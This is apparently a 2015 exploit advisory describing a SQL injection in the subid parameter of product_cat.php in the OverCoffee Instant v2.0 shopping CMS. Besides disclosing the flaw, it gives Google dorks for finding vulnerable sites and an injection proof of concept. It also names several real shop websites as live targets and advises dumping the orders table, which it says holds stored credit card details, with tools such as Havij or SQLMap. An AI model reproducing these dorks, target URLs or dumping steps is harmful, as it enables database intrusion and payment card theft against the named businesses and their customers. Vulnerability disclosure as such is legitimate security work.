OverCoffee Instant 2.0 SQL Injection

2015-03-09T00:00:00
ID PACKETSTORM:130726
Type packetstorm
Reporter X-Cisadane
Modified 2015-03-09T00:00:00

Description

                                        
                                            `==========================================================================================   
Instant v2.0 SQL Injection Vulnerability   
==========================================================================================   
  
:-------------------------------------------------------------------------------------------------------------------------:   
: # Exploit Title : Instant v2.0 SQL Injection Vulnerability   
: # Date : 10th March 2015   
: # Author : X-Cisadane   
: # CMS Name : Instant v2.0 (another OverCoffee production)   
: # CMS Developer : overcoffee.com   
: # Version : 2.0   
: # Category : Web Applications   
: # Vulnerability : SQL Injection   
: # Tested On : Google Chrome Version 40.0.2214.115 m (Windows 7), Havij 1.16 Pro & SQLMap 1.0-dev-nongit-20150125   
: # Greetz to : Explore Crew, CodeNesia, Bogor Hackers Community, Ngobas and Winda Utari   
:-------------------------------------------------------------------------------------------------------------------------:   
  
A SQL Injection Vulnerability has been discovered in the Instant v.2.0 CMS.   
The Vulnerability is located in the subid Value of the product_cat.php File. Attackers are able to execute own SQL commands   
by usage of a GET Method Request with manipulated subid Value.   
Attackers are able to read Database information by execution of own SQL commands.   
  
DORKS (How to find the target) :   
================================   
"Powered By Instant" inurl:/catalog/   
inurl:/product_cat.php?subid=   
Or use your own Google Dorks :)   
  
Proof of Concept   
================   
  
SQL Injection   
PoC :   
http://[Site]/[Path]/product_cat.php/subid=['SQLi]   
And you have to change the URL structure to   
http://[Site]/[Path]/product_cat.php?subid=['SQLi]   
  
Example :   
http://www.cynthiawebbdesigns.com/catalog/product_cat.php/subid=16617/index.html?PHPSESSID=3ef7e156add41316201ffe87bd489a7d   
Just change the URL structure to http://www.cynthiawebbdesigns.com/catalog/product_cat.php?subid='16617   
And you'll see this error notice : You have an error in your SQL syntax; check the manual that corresponds to your MySQL ...   
  
Note : This CMS stored Credit Card Infos on the Database, just open your Fav Tool and Dump the orders Table   
PIC / PoC : http://i59.tinypic.com/4l0poh.png   
  
Another Vuln Sites :   
http://www.unitymarketingonline.com/catalog/product_cat.php?subid=['SQLi]   
http://www.peacefulinspirations.net/catalog/product_cat.php?subid=['SQLi]   
http://www.dickensgifts.com/catalog/product_cat.php?subid=['SQLi]   
http://www.frogandprincellc.com/catalog/product_cat.php?subid=['SQLi]   
http://www.debrekht.com/catalog/product_cat.php?subid=['SQLi]   
... etc ...  
`